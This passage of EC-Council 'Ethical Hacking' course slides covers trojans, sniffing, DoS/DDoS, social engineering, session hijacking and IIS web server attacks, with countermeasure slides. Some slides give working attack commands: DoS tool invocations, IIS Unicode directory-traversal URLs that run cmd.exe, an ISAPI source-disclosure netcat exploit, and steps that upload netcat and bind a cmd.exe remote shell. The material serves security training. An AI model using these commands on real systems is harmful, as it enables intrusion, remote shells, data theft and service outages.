making it much more difficult to detect than TCP or UDP based
backdoors.
~As far as the network is concerned, a series of ICMP packets are shot
back and forth: Ping, Pong-response. As far as the attacker is
concerned, commands can be typed into the loki client and executed
on the server.
EC-Council
Loki Countermeasures
~ Configure your firewall to block ICMP incoming and
outgoing echo packets.
~ Blocking ICMP will disable ping request and may cause
inconvenience to users.
~ So you need to carefully decide on security Vs
convenience.
~ Loki also has the option to run over UDP port 53 (DNS
queries and responses.)
EC-Council
Reverse WWW Shell - Covert channels
using HTTP
~ Reverse WWW shell allows an attacker to access a
machine on your internal network from the outside.
~ The attacker must install a simple trojan program on a
machine in your network, the Reverse WWW shell server.
~ On a regular basis, usually 60 seconds, the internal server
will try to access the external master system to pick up
commands.
~ If the attacker has typed something into the master
system, this command is retrieved and executed on the
internal system.
~ Reverse WWW shell uses standard http protocol.
~ It looks like internal agent is browsing the web.
EC-Council
Backdoor Countermeasures
~ Most commercial ant-virus products can automatically
scan and detect backdoor programs before they can
cause damage (Eg. before accessing a floppy, running
exe or downloading mail)
~ An inexpensive tool called Cleaner
(http://www.moosoft.com/cleanet.html) can identify
and eradicate 1000 types of backdoor programs and
trojans.
~ Educate your users not to install applications
downloaded from the internet and e-mail attachments.
EC-Council
Tool: fPort
EC-Council
Tool: TCPView
EC-Council
Process Viewer
EC-Council
Inzider - Tracks Processes and Ports
http://ntsecurity.nu/cgi-bin/download/inzider.exe.pl
~ This is a very useful tool that lists processes in your
Windows system and the ports each one listen on.
~ For instance, under Windows NT/2K, BO2K injects
itself into other processes, so it is not visible in the Task
Manager as a separate process.
~ When you run Inzider, you will see the port BO2K has
bound in its host process
EC-Council
Hacking Tool: Senna Spy
http://sennaspy.cjb.net/
~ Senna Spy Generator 2.0
is a trojan generator.
Senna Spy Generator is
able to create a Visual
Basic source code for a
trojan based on a few
options.
~ This trojan is compiled
from generated source
code, anything could be
changed in it.
EC-Council
Hacking Tool: Hard Disk Killer (HDKP4.0)
http://www.hackology.com/programs/hdkp/ginfo.shtml
~ The Hard Drive Killer Pro series of programs offer one
the ability to fully and permanently destroy all data on
any given Dos or Win3.x/9x/NT/2000 based system. In
other words 90% of the PCs worldwide.
~ The program, once executed, will start eating up the
hard drive, and or infect and reboot the hard drive
within a few seconds.
~ After rebooting, all hard drives attached to the system
would be formatter (in an un recoverable manner)
within only 1 to 2 seconds, regardless of the size of the
hard drive.
EC-Council
System File Verification
~Windows 2000 introduced
Windows File Protection
(WFP) which protects system
files that were installed by
Windows 2000 setup
program from being
overwritten.
~The hashes in this file could
be compared with the SHA-1
hashes of the current system
files to verify their integrity
against the 'factory originals‘
~sigVerif.exe utility can
perform this verification
process.
EC-Council
Tool: Tripwire
~ Tripwire will automatically calculate cryptographic
hashes of all key system files or any file that you want to
monitor for modifications.
~ Tripwire software works by creating a baseline
“snapshot” of the system
~ It will periodically scan those files, recalculate the
information, and see if any of the information has
changed. If there is a change an alarm is raised.
EC-Council
Tool: Beast
~ Beast is a powerful
Remote Administration
Tool (AKA trojan) built
with Delphi 7.
~ One of the distinct
features of the Beast is
that is an all-in-one
trojan (client, server and
server editor are stored
in the same application).
~ An important feature of
the server is that is using
the injecting technology.
EC-Council
Summary
~ Trojans are malicious pieces of code that carry cracker
software to a target system
~ Trojans are used primarily to gain and retain access on
the target system
~ Trojans often reside deep in the system and make
registry changes that allow it to meet its purpose as a
remote administration tool
~ Popular Trojans include back orifice, netbus, subseven,
beast etc.
~ Awareness and preventive measures are the best
defense against Trojans.
Ethical Hacking
Module VII
Sniffers
EC-Council
Module Objective
~ Overview of Sniffers
~ Understanding Sniffers from a cracker
perspective
~ Comprehending Active and Passive Sniffing
~ ARP Spoofing and Redirection
~ DNS and IP Sniffing and Spoofing
~ HTTPS Sniffing
~ Illustration of various tools used in the above
context
EC-Council
Sniffers – An Introduction
~ Sniffers monitor network data.
~ A sniffer can be a self-contained software program or a
hardware device with the appropriate software or
firmware programming.
~ Sniffers usually act as network probes or "snoops" --
examining network traffic but not intercepting or
altering it.
~ Some sniffers work only with TCP/IP packets, but the
more sophisticated tools can work with many other
protocols and at lower levels such as the Ethernet
frame.
EC-Council
Security Concern
~ Users of computer networks unwittingly disclose
sensitive information about themselves through the use
of insecure software, and protocols.
~ Standard implementations of widely adopted protocols
such as Windows file sharing (CIFS/SMB), telnet,
POP3, HTTP and FTP transmit login passwords in clear
text, exposing an extremely large segment of the
internet population to sniffing-related attacks.
EC-Council
Tool: Ethereal
EC-Council
Tool: Snort
~There are three main modes in
which Snort can be configured:
sniffer, packet logger, and network
intrusion detection system.
~Sniffer mode simply reads the
packets off of the network and
displays them for you in a
continuous stream on the console.
~Packet logger mode logs the
packets to the disk.
~Network intrusion detection
mode is the most complex and
configurable configuration,
allowing Snort to analyze network
traffic for matches against a user
defined rule set
EC-Council
Tool: Windump
~ WinDump is the porting to the Windows platform of
tcpdump, the most used network sniffer/analyzer for
UNIX.
EC-Council
Tool: Etherpeek
EC-Council
Passive Sniffing
Hub
Attacker’s
PC
LAN
EC-Council
Active Sniffing
EC-Council
EtherFlood
~ EtherFlood floods a switched network with Ethernet
frames with random hardware addresses.
~ The effect on some switches is that they start sending all
traffic out on all ports so that the attacker is able to sniff
all traffic on the network.
EC-Council
dsniff
~ dsniff is a collection of tools for network auditing and
penetration testing.
~ dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and
webspy passively monitor a network for interesting data
(passwords, e-mail, files, etc.).
~ arpspoof, dnsspoof, and macof facilitate the
interception of network traffic normally unavailable to
an attacker (e.g, due to layer-2 switching).
~ sshmitm and webmitm implement active monkey-in-
the-middle attacks against redirected SSH and HTTPS
sessions by exploiting weak bindings in ad-hoc PKI.
EC-Council
ARP Spoofing
1. Configure IP
Forwarding
4. Sniff the traffic
from the link
2. Send fake ARP
response to re-map
default router IP to
attacker’s MAC
3. Victim sends traffic
destined for outside world
based on poisoned ARP
table entry
5. Packets are forwarded
from attacker’s machine
to the actual default
router for delivery to the
outside world
Si
Si
EC-Council
Sniffing HTTPS and SSH
~ SSL connection uses a session key to encrypt all data
sent by server and client.
~ SSH is based on the public key encryption idea.
~ With SSH a session key is transmitted in an encrypted
fashion using a public key stored on the server.
~ As such, these protocols – SSL and SSH are sound from
a security standpoint. The problem however lies in the
basis of these protocols – namely trust certificates and
public keys.
EC-Council
Man in the Middle Attack
EC-Council
Macof, MailSnarf, URLSnarf, WebSpy
~Macof floods the local
network with random MAC
addresses, causing some
switches to fail open in
repeating mode, and thereby
facilitates sniffing.
~Mailsnarf is capable of
capturing and outputting
SMTP mail traffic that is
sniffed on the network.
~urlsnarf is a neat tool for
monitoring Web traffic.
~Webspy allows the user to
see all the WebPages visited by
the victim.
EC-Council
Ettercap
EC-Council
SMAC
EC-Council
Mac Changer
~ MAC changer is a Linux utility for setting a specific
MAC address for a network interface.
~ It enables the user to set the MAC address randomly. It
allows specifying the MAC of another vendor or setting
another MAC of the same vendor.
~ The user can also set a MAC of the same kind (e.g.:
wireless card).
~ It offers a choice of vendor MAC list (more than 6200
items) to choose from.
EC-Council
Iris
EC-Council
NetIntercept
EC-Council
DNS Sniffing and Spoofing
~ DNS Spoofing is said to have occurred when a DNS
entry points to another IP instead of the legitimate IP
address.
~ When an attacker wants to poison a DNS cache, he will
use a faulty DNS – which can be his own domain
running a hacked DNS server. The DNS server is
termed as hacked because the IP address records are
manipulated to suit the attacker’s needs.
EC-Council
WinDNSSpoof
~ This tool is a simple DNS ID Spoofer for Windows
9x/2K.
~ In order to use it you must be able to sniff traffic of the
computer being attacked.
~ Usage : wds -h
Example : wds -n www.microsoft.com -i 216.239.39.101
-g 00-00-39-5c-45-3b
EC-Council
Summary
~ A sniffer is a piece of software that captures the traffic
flowing into and out of a computer attached to a
network.
~ A sniffer attack is commonly used to grab logins and
passwords that are traveling around on the network.
~ Sniffing can be active or passive.
~ Popular attack methods include man in the middle
attack and session hijacking
~ On switched networks, MAC flooding and ARP spoofing
is carried out.
Ethical Hacking
Module VIII
Denial Of Service
EC-Council
Module Objective
~ What is a Denial Of Service Attack?
~ What is a Distributed Denial Of Service Attack?
~ Why are they difficult to protect against?
~ Types of denial of service attacks
~ Tools for running DOS attacks
~ Tools for running DDOS attacks
~ Denial of Service Countermeasures
EC-Council
It’s Real
On February 6th, 2000, Yahoo portal was shut down for
3 hours. Then retailer Buy.com Inc. (BUYX) was hit the
next day, hours after going public. By that evening, eBay
(EBAY), Amazon.com (AMZN), and CNN (TWX) had
gone dark. And in the morning, the mayhem continued
with online broker E*Trade (EGRP) and others having
traffic to their sites virtually choked off.
(Business Week Online, 12 February 2000)
EC-Council
What is a Denial Of Service Attack?
~ A denial of service attack (DOS) is
an attack through which a person
can render a system unusable or
significantly slow down the
system for legitimate users by
overloading the resources, so that
no one can access it.
~ If an attacker is unable to gain
access to a machine, the attacker
most probably will just crash the
machine to accomplish a denial of
service attack.
EC-Council
Types of denial of service attacks
~ There are several general
categories of DoS attacks.
~ Popularly, the attacks are
divided into three classes:
• bandwidth attacks,
• protocol attacks, and
• logic attacks.
EC-Council
What is Distributed Denial of Service
Attacks?
~An attacker launches the attack
using several machines. In this
case, an attacker breaks into
several machines, or coordinates
with several zombies to launch
an attack against a target or
network at the same time.
~This makes it difficult to detect
because attacks originate from
several IP addresses.
~If a single IP address is
attacking a company, it can block
that address at its firewall. If it is
30000 this is extremely difficult.
EC-Council
Ping of Death
~An attacker sends a large
ping packet to the victim's
machine. Most OS do not
know what to do with a
packet that is larger than
the maximum size, it causes
the OS to hang or crash.
Example: Ping of Death
causes blue screen of death
in Windows NT.
~Ping of Death uses ICMP
to cause a denial of service
attack against a given
system.
EC-Council
Hacking Tool: SSPing
~ SSPing is a DoS tool.
~ SSPing program sends the victim's computer a series of
highly fragmented, oversized ICMP data packets.
~ The computer receiving the data packets lock when it
tries to put the fragments together.
~ The result is a memory overflow which in turn causes
the machine to stop responding.
~ Affects Win 95/NT and Mac OS
EC-Council
Hacking Tool: Land Exploit
~ Land Exploit is a DoS attack in which a program sends a
TCP SYN packet where the target and source addresses
are the same and port numbers are the same.
~ When an attacker wants to attack a machine using the
land exploit, he sends a packet in which the
source/destination ports are the same.
~ Most machines will crash or hang because they do not
know how to handle it.
EC-Council
Hacking Tool: Smurf
~ Smurf is a DoS attack involving forged ICMP packets
sent to a broadcast address.
~ Attackers spoof the source address on ICMP echo
requests and sending them to an IP broadcast address.
This causes every machine on the broadcast network to
receive the reply and respond back to the source
address that was forged by the attacker.
1. An attacker starts a forged ICMP packet-source address
with broadcast as the destination.
2. All the machines on the segment receives the broadcast and
replies to the forged source address.
3. This results in DoS due to high network traffic.
EC-Council
SYN Flood
~ SYN attack floods a targeted system with a series of SYN
packets.
~ Each packet causes the targeted system to issue a SYN-
ACK response, while the targeted system waits for the
ACK that follows the SYN-ACK, it queues up all
outstanding SYN-ACK responses on what is known as a
backlog queue.
~ SYN-ACKs are moved of the queue only when an ACK
comes back or when an internal timer (which is set at
relatively long intervals) terminates the TCP three-way
handshake
~ Once the queue is full, the system will ignore all
incoming SYN requests, making the system unavailable
for legitimate users.
EC-Council
Hacking Tool: WinNuke
~ WinNuke works by sending a packet with "Out of band"
data to port 139 of the target host. First off, port 139 is
the NetBIOS port and does not accept packets unless
the flag OOB is set in incoming packet.
~ The OOB stands for Out Of Band. When the victim's
machine accepts this packet, it causes the computer to
crash a blue screen.
~ Because the program accepting the packets does not
know how to appropriately handle Out Of Band data, it
crashes.
EC-Council
Hacking Tool: Jolt2
~ Jolt2 enables users across different networks to send IP
fragment-driven denial of service attacks against
NT/2000 by making victim's machine utilize 100% of
its CPU when it attempts to process the illegal packets.
c: > jolt2 1.2.3.4 -p 80 4.5.6.7
~ The above command launches the attack from the
attacker's machine with a spoofed IP address of 1.2.3.4
against the IP address 4.5.6.7
~ The victim's machine CPU resources reach 100%
causing the machine to lock up.
EC-Council
Hacking Tool: Bubonic.c
~ Bubonic.c is a DOS exploit that can be run against
Windows 2000 machines.
~ It works by randomly sending TCP packets with
random settings with the goal of increasing the load of
the machine, so that it eventually crashes.
c: > bubonic 12.23.23.2 10.0.0.1 100
EC-Council
Hacking Tool: Targa
~ Targa is a program that can be used to run 8 different
Denial Of Service attacks.
~ The attacker has the option to either launch individual
attacks or to try all the attacks until it is successful.
~ Targa is a very powerful program and can do a lot of
damage to a company's network.
EC-Council
Tools for running DDOS Attacks
~ The main tools for
running DDOS attacks
are:
1. Trinoo
2. TFN
3. Stacheldraht
4. Shaft
5. TFN2K
6. mstream
EC-Council
DDOS - Attack Sequence
~ All of the DDOS tools follow
this sequence.
~ Mass-intrusion Phase -
automated tools identify
potential systems with
weaknesses; then root
compromise them and install
the DDOS software on them.
These are the primary victims.
~ DDOS Attack Phase - The
compromised systems are
used to run massive DOS
against a victim site.
EC-Council
Trinoo
~ Trinoo (TrinOO) was the
first DDOS tool to be
discovered.
~ Found in the wild (binary
form) on Solaris 2.x
systems compromised by
buffer overrun bug in
RPC services: statd,
cmsd, ttdbserverd.
~ Trinoo daemons were
UDP based, password
protected remote
command shells running
on compromised
systems.
DDOS Structure
~ The attacker controls one
or more master servers
by password protected
remote command shells.
~ The master systems
control multiple daemon
systems. Trinoo calls the
daemons "Bcast" hosts.
~ Daemons fire packets at
the target specified by
the attacker.
EC-Council
Hacking Tool: Trinoo
~ Trinoo is a DDOS attack tool. It uses the following TCP
Ports:
• Attacker to master: 27665/tcp
• Master to daemon: 27444/udp
• Daemon to master: 31335/udp
~ Daemons reside on the systems that launch that the
attack, and masters control the daemon systems.
~ Since Trinoo uses TCP, it can be easily detected and
disabled.
EC-Council
TFN
~ Could be thought of as 'son of trinoo'
~ Improved on some of the weaknesses of trinoo by
adding different types of attacks that could be mounted
against the victim site.
~ Structured like trinoo with attackers, clients (masters)
and daemons.
~ Initial system compromise allows the TFN programs to
be installed.
EC-Council
Hacking Tool: TFN2K
http://packetstorm.security.com/distributed
~ TFN2K is a DDOS program which runs in distributed
mode. There are two parts to the program: client and
server.
~ The server (also known as zombies) runs on a machine
in listening mode and waits for commands from the
client.
• Running the server
• #td
• Running the client
• #tn -h 23.4.56.4 -c8 -i 56.3.4.5
~ This command starts an attack from 23.4.56.4 to the
victim's computer 56.3.4.5
EC-Council
Hacking Tool: Stacheldraht
~ Stacheldraht combines the
features of TFN and Trinoo
but adds encryption layer
between daemons.
~ Stacheldraht uses TCP and
ICMP on the following ports:
Client to Handler: 16660
TCP
Handler to and from agents:
65000 ICMP
EC-Council
Preventing DoS Attacks
~ You could do the following things to minimize the DoS
attack:
1. Effective robust design
2. Bandwidth limitations
3. Keep systems patched
4. Run the least amount of services
5. Allow only necessary traffic
6. Block IP addresses
~ Due to the power of DoS attacks and the way they
work, there is nothing that can be done to prevent a
Dos attack entirely.
EC-Council
Preventing the DDoS
1. Keep the network secure
2. Install IDS (Intrusion Detection System)
3. Use scanning tools
4. Run zombie tools
IDS pattern matching technologies have a database of
signatures. When it finds packets that have a given
pattern, it sets off an alarm.
EC-Council
Common IDS systems
1. Shareware
2. Snort
3. Shadow
4. Courtney
5. Commercial
6. ISS RealSecure
7. Axent NetProwler
8. Cisco Secure ID (Net Ranger)
9. Network Flight Recorder
10. Network Security Wizard's Dragon
EC-Council
Use Scanning Tools
~ There are several tools available which could detect
whether a system is being used as a DDOS server. The
following tools can detect TFN2K, Trinoo and
Stacheldraht.
~ Find_DDOS
• (http://ftp.cert.org.tw/tools/Security_Scanner/find_ddos/)
~ SARA
• (http://www.cromwell-intl.com/security/468-netaudit.html)
~ DDoSPing v2.0
• (http://is-it-true.org/pt/ptips19.shtml)
~ RID
• (http://staff.washington.edu/dittrich/misc/ddos/)
~ Zombie Zapper
• (http://razor.bindview.com/tools/zombiezapper_form.shtml)
EC-Council
Summary
~ Denial of Service is a very commonly used attack
methodology.
~ Distributed Denial Of Service using a multiplicity of
Zombie machines is an often seen attack methodology.
~ There are various tools available for attackers to
perpetrate DOS attacks.
~ Protection against DOS is difficult due to the very
nature of the attacks.
~ Different scanning tools are available to aid detection
and plugging of vulnerabilities leading to DOS
Ethical Hacking
Module IX
Social Engineering
EC-Council
Module Objective
~ What is Social Engineering?
~ Common Types of Attacks
~ Social Engineering by Phone
~ Dumpster Diving
~ Online Social Engineering
~ Reverse Social Engineering
~ Policies and Procedures
~ Employee Education
EC-Council
What is Social Engineering?
~ Social Engineering is the human side of breaking into a
corporate network.
~ Companies with authentication processes, firewalls,
virtual private networks and network monitoring
software are still wide open to attacks
~ An employee may unwittingly give away key
information in an email or by answering questions over
the phone with someone they don't know or even by
talking about a project with co workers at a local pub
after hours.
EC-Council
Art of Manipulation.
~ Social Engineering is the acquisition of sensitive
information or inappropriate access privileges by an
outsider, based upon building of inappropriate trust
relationships with outsiders.
~ The goal of a social engineer is to trick someone into
providing valuable information or access to that
information.
~ It preys on qualities of human nature, such as the desire
to be helpful, the tendency to trust people and the fear
of getting in trouble.
EC-Council
Human Weakness
~ People are usually the
weakest link in the
security chain.
~ A successful defense
depends on having good
policies in place and
educating employees to
follow the policies.
~ Social Engineering is the
hardest form of attack to
defend against because it
cannot be defended with
hardware or software
alone.
EC-Council
Common Types of Social Engineering
~ Social Engineering can
be broken into two types:
human based and
computer based
1. Human-based Social
Engineering refers to
person to person
interaction to retrieve the
desired information.
2. Computer based Social
Engineering refers to
having computer
software that attempts to
retrieve the desired
information.
EC-Council
Human based - Impersonation
Human based social
engineering techniques can
be broadly categorized into:
~ Impersonation
~ Posing as Important User
~ Third-person Approach
~ Technical Support
~ In Person
• Dumpster Diving
• Shoulder Surfing
EC-Council
Example
EC-Council
Example
EC-Council
Computer Based Social Engineering
~ These can be divided into
the following broad
categories:
• Mail / IM attachments
• Pop-up Windows
• Websites / Sweepstakes
• Spam Mail
EC-Council
Reverse Social Engineering
~ More advanced method of gaining illicit information is
known as "reverse social engineering"
~ This is when the hacker creates a persona that appears
to be in a position of authority so that employees will
ask him for information, rather than the other way
around.
~ The three parts of reverse social engineering attacks are
sabotage, advertising and assisting.
EC-Council
Policies and Procedures
~ Policy is the most critical component to any information
security program.
~ Good policies and procedures are not effective if they
are not taught and reinforced to the employees.
~ They need to be taught to emphasize their importance.
After receiving training, the employee should sign a
statement acknowledging that they understand the
policies.
EC-Council
Security Policies - Checklist
~ Account Setup
~ Password change policy
~ Help desk procedures
~ Access Privileges
~ Violations
~ Employee identification
~ Privacy Policy
~ Paper documents
~ Modems
~ Physical Access Restrictions
~ Virus control
EC-Council
Summary
~ Social Engineering is the human side of breaking into a
corporate network.
~ Social Engineering involves acquiring sensitive
information or inappropriate access privileges by an
outsider.
~ Human-based Social Engineering refers to person to
person interaction to retrieve the desired information.
~ Computer based Social Engineering refers to having
computer software that attempts to retrieve the desired
information
~ A successful defense depends on having good policies in
place and diligent implementation.
Ethical Hacking
Module X
Session Hijacking
EC-Council
Module Objective
~ Spoofing Vs Hijacking
~ Types of session hijacking
~ TCP/IP concepts
~ Performing Sequence prediction
~ ACK Storms
~ Session Hijacking Tools
EC-Council
Understanding session hijacking
~ Understanding the flow
of message packets over
the Internet by dissecting
the TCP stack.
~ Understanding the
security issues involved
in the use of IPv4
standard
~ Familiarizing with the
basic attacks possible
due to the IPv4 standard.
EC-Council
Spoofing Vs Hijacking
A spoofing attack is different from a hijack in that an
attacker is not actively taking another user offline to
perform the attack. he pretends to be another user or
machine to gain access.
Bob (Victim) Server
I am Bob!
EC-Council
Spoofing Vs Hijacking
With Hijacking an attacker is taking over an existing
session, which means he is relying on the legitimate
user to make a connection and authenticate. Then take
over the session.
I am Bob!
Bob
(Victim)
Attacker
Server
Bob logs on to server
Dial in
EC-Council
Steps in Session Hijacking
1. Tracking the
session
2. Desynchronizing
the connection
3. Injecting the
attacker’s packet
EC-Council
Types of session Hijacking
There are two types of hijacking attacks:
~ Active
• In an active attack, an attacker finds an active
session and takes over.
~ Passive
• With a passive attack, an attacker hijacks a session,
but sits back and watches and records all of the
traffic that is being sent forth.
EC-Council
TCP Concepts 3 Way Handshake
1. Bob Initiates a connection with the server. Bob sends a
packet to the server with SYN bit set.
2. The server receives this packet and sends back a packet
with the SYN bit and an ISN (Initial Sequence Number)
for the server.
3. Bob sets the ACK bit acknowledging the receipt of the
packet and increments the sequence number by 1
4. The two machines have successfully established a
session.
1
2
3
EC-Council
Sequence Numbers
~ Sequence Numbers are very important to provide
reliable communication but they are also crucial to
hijacking a session.
~ Sequence numbers are a 32-bit counter, which means
the value can be any of over 4 billion possible
combinations.
~ The sequence numbers are used to tell the receiving
machine what order the packets should go in when they
are received.
~ Therefore an attacker must successfully guess the
sequence number to hijack a session.
EC-Council
Programs that perform Session Hijacking
There are several
programs available that
perform session
hijacking.
Following are a few that
belongs to this category:
• Juggernaut
• Hunt
• TTY Watcher
• IP Watcher
• T-Sight
EC-Council
Hacking Tool: Juggernaut
~ Juggernaut is a network sniffer that can be used to
hijack TCP sessions. It runs on Linux Operating
systems.
~ Juggernaut can be set to watch for all network traffic or
it can be given a keyword like password to look out for.
~ The main function of this program is to maintain
information about various session connections that are
occurring on the network.
~ The attacker can see all the sessions and he can pick a
session he wants to hijack.
EC-Council
Hacking Tool: Hunt
http://lin.fsid.cvut.cz/^kra/index.html
~ Hunt is a program that can be used to listen, intercept,
and hijack active sessions on a network.
~ Hunt Offers:
• Connection management
• ARP Spoofing
• Resetting Connection
• Watching Connection
• MAC Address discovery
• Sniffing TCP traffic
EC-Council
Hacking Tool: TTY Watcher
http://www.cerias.purdue.edu
~ TTY-watcher is a utility to monitor and control users on
a single system.
~ Sharing a TTY. Anything the user types into a
monitored TTY window will be sent to the underlying
process. In this way you are sharing a login session with
another user.
~ After a TTY has been stolen, it can be returned to the
user as though nothing happened.
(Available only for Sun Solaris Systems.)
EC-Council
Hacking Tool: IP watcher
http://engarde.com
~ IP watcher is a commercial session hijacking tool that
allows you to monitor connections and has active
countermeasures for taking over a session.
~ The program can monitor all connections on a network
allowing an attacker to display an exact copy of a
session in real-time, just as the user of the session sees
the data.
EC-Council
T-Sight
http://engarde.com
~ T-Sight, an advanced intrusion investigation and
response tool for Windows NT and Windows 2000 can
assist you when an attempt at a break-in or compromise
occurs.
~ With T-sight, you can monitor all your network
connections (i.e. traffic) in real-time and observe the
composition of any suspicious activity that takes place.
~ T-Sight has the capability to hijack any TCP sessions on
the network.
~ Due to security reasons Engarde Systems licenses this
software to pre-determined IP address.
EC-Council
Remote TCP Session Reset Utility
EC-Council
Dangers posed by Hijacking
1. Most computers are vulnerable
2. Little can be done to protect against it
3. Hijacking is simple to launch
4. Most countermeasures do not work
5. Hijacking is very dangerous.
EC-Council
Protecting against Session Hijacking
1. Use Encryption
2. Use a secure protocol
3. Limit incoming connections
4. Minimize remote access
5. Have strong authentication.
EC-Council
Summary
~ In the case of a session hijacking an attacker relies on
the legitimate user to connect and authenticate and
then take over the session.
~ In spoofing attack, the attacker pretends to be another
user or machine to gain access.
~ Successful session hijacking is extremely difficult and
only possible when a number of factors are under the
attacker's control.
~ Session hijacking can be active or passive in nature
depending on the degree of involvement of the attacker
in the attack.
~ A variety of tools exist to aid the attacker in
perpetrating a session hijack.
~ Session Hijacking could be very dangerous and there is
a need for implementing strict countermeasures.
Ethical Hacking
Module XI
Hacking Web Servers
EC-Council
Module Objective
~Introduction to Web Servers
~Popular Web Servers and common Vulnerabilities
~Apache Web Server Security
~Sun ONE Web Server Security
~IIS Server Security
~Attacks against Web Servers
~Tools used in Attack
~Countermeasures
EC-Council
How Web Servers Work
1. The browser breaks the URL
into three parts:
1. The protocol ("http")
2. The server name
("www.website.com")
3. The file name
("webpage.html")
2. The browser communicates
with a name server, which
translates the server name,
www.website.com, into an IP
address
3. The browser then forms a
connection to the Web server
at that IP address on port 80.
4. Following the HTTP
protocol, the browser
sends a GET request to
the server, asking for the
file http://webpage.html.
5. The server sends the
HTML text for the Web
page to the browser.
6. The browser reads the
HTML tags and formats
the page onto the screen.
EC-Council
Popular Web Servers and Common Security
Threats
~ Apache Web Server
~ IIS Web Server
~ Sun ONE Web Server
~ Nature of Security Threats in a Web Server
Environment.
• Bugs or Web Server Misconfiguration.
• Browser-Side or Client Side Risks.
• Sniffing
• Denial of Service Attack.
EC-Council
Apache Vulnerability
~ The Apache Week tracks the vulnerabilities in Apache
Server. Even Apache has its share of bugs and fixes.
~ For instance, consider the vulnerability which was found
in the Win32 port of Apache 1.3.20.
• Long URLs passing through the mod_negative,
mod_dir and mode_autoindex modules could cause
Apache to list directory contents.
• The concept is simple but requires a few trial runs.
• A URL with a large number of trailing slashes:
– /cgi-bin /////////////// / // / / / / / // / / / could produce
directory listing of the original directory.
EC-Council
Attacks against IIS
~ IIS is one of the most widely used Web server
platforms on the Internet.
~ Microsoft's Web Server has been the frequent target
over the years.
~ It has been attacked by various vulnerabilities.
Examples include:
• ::$DATA vulnerability
• showcode.asp vulnerability
• Piggy backing vulnerability
• Privilege command execution
• Buffer Overflow exploits (IIShack.exe)
EC-Council
IIS Components
~ IIS relies heavily on a collection of DLLs that work
together with the main server process, inetinfo.exe, to
provide various capabilities.
~ Example: Server side scripting, Content Indexing, Web
Based printing etc.
~ This architecture provides attackers with different
functionality to exploit via malicious input.
EC-Council
ISAPI DLL Buffer Overflows
~ One of the most extreme security vulnerabilities
associated with ISAPI DLLs is the buffer overflow.
~ In 2001, IIS servers were ravaged by versions of the
Code Red and Nimda worms which were both based on
buffer overflow exploits.
EC-Council
IPP Printer Overflow
~ There is a buffer overflow in IIS within the ISAPI filter
that handles .printer files
(c:winntsystem32msw3prt.dll) that provides support
for the Internet Printing Protocol (IPP)
~ IPP enables the web-based control of various aspects of
networked printers.
~ The vulnerability arises when a buffer of approximately
420 bytes is sent within the HTTP host.
GET /NULL.printer HTTP/1.0 HOST: [buffer]
EC-Council
Hacking Tool: IISHack.exe
~ iishack.exe overflows a buffer used by IIS http daemon,
allowing for arbitrary code to be executed.
c: iishack www.yourtarget.com 80
www.yourserver.com/thetrojan.exe
~ www.yourtarget.com is the IIS server you're hacking,80 is
the port its listening on, www.yourserver.com is some
webserver with your trojan or custom script (your own, or
another), and /thetrojan.exe is the path to that script.
EC-Council
IPP Buffer Overflow Countermeasures
~ Install latest service pack from Microsoft.
~ Remove IPP printing from IIS Server
~ Install firewall and remove unused extensions
~ Implement aggressive network egress filtering
~ Use IISLockdown and URLScan utilities
~ Regularly scan your network for vulnerable servers
EC-Council
ISAPI DLL Source disclosures
~ Microsoft IIS 4.0 and 5.0 can be made to disclose
fragments of source code which should otherwise be in
accessible.
~ This is done by appending "+.htr" to a request for a
known .asp (or .asa, .ini, etc) file.
~ appending this string causes the request to be handled
by ISM.DLL, which then strips the ‘+.htr’ string and
may disclose part or all of the source of the .asp file
specified in the request.
EC-Council
ISAPI.DLL Exploit
~ Here's a sample file called htr.txt that you can pipe
through a netcat to exploit the ISAPI.DLL vulnerability.
• GET /site1/global.asa+.htr HTTP/1.0
• [CRLF]
• [CRLF]
~ Piping through netcat connected to a vulnerable server
produces the following results:
• c: >nc -vv www.victim.com 80 <htr.txt
• HTTP/1.1 200 OK
• Server: Microsoft -IIS /5.0
• <!--filename = global.asa --> ("Profiles_ConnectionString")
• "DSN=Profiles; UID=Company_user;
• password=secret"
Password
Revealed
EC-Council
IIS Directory Traversal
~ The vulnerability results because of a canonicalization
error affecting CGI scripts and ISAPI extensions (.ASP
is probably the best known ISAPI-mapped file type.)
~ canonicalization is the process by which various
equivalent forms of a name can be resolved to a single,
standard name.
~ For example, "%c0%af" and "%c1%9c" are overlong
representations for ?/? and ??
~ Thus, by feeding the HTTP request like the following to
IIS, arbitrary commands can be executed on the server:
~ GET/scripts/..%c0%af../winnt/system32/cmd.exe?/c+
dir=c: HTTP/1.0
EC-Council
Unicode
~ ASCII characters for the dots are replaced with
hexadecimal equivalent (%2E).
~ ASCII characters for the slashes are replaced with
Unicode equivalent (%c0%af).
~ Unicode 2.0 allows multiple encoding possibilities for
each characters.
~ Unicode for "/": 2f, c0af, e080af, f08080af,
f8808080af, .....
~ Overlong Unicode are NOT malformed, but not allowed
by a correct Unicode encoder and decoder.
~ Maliciously used to bypass filters that only check short
Unicode.
EC-Council
IIS Logs
~ IIS logs all the visits in log files. The log file is located at
<%systemroot%>logfiles
~ Be careful. If you don't use proxy, then your IP will be
logged.
~ This command lists the log files:
http://victim.com/scripts/..%c0%af../..%c0%af../..%c0
%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%
c0%af../winnt/system32/cmd.exe?/c+dir+C:Winntsy
stem32LogfilesW3SVC1
EC-Council
Hacking Tool: IISxploit.exe
This tool automates directory traversal exploit in IIS
EC-Council
Hacking Tool: execiis-win32.exe
This tool exploits IIS directory traversal and takes
command from cmd and executes them on the IIS
Server
EC-Council
Hacking Tool: Unicodeuploader.pl
~ Unicode upload creator (unicodeloader.pl) works as
follows:
Two files (upload.asp and upload.inc - have them in
the same dir as the PERL script) are built in the
webroot (or any where else) using echo and some
conversion strings. These files allow you to upload any
file by simply surfing with a browser to the server.
1. Find the webroot
2. perl unicodeloader target: 80 'webroot'
3. surf to target/upload.asp and upload nc.exe
4. perl unicodexecute3.pl target: 80 'webroot/nc -l -p 80 -e
cmd.exe'
5. telnet target 80
Above procedure will drop you into the shell on the box.
EC-Council
Hacking Tool: cmdasp.asp
~ After uploading nc.exe to the web server, you can
shovel a shell back to your pc.
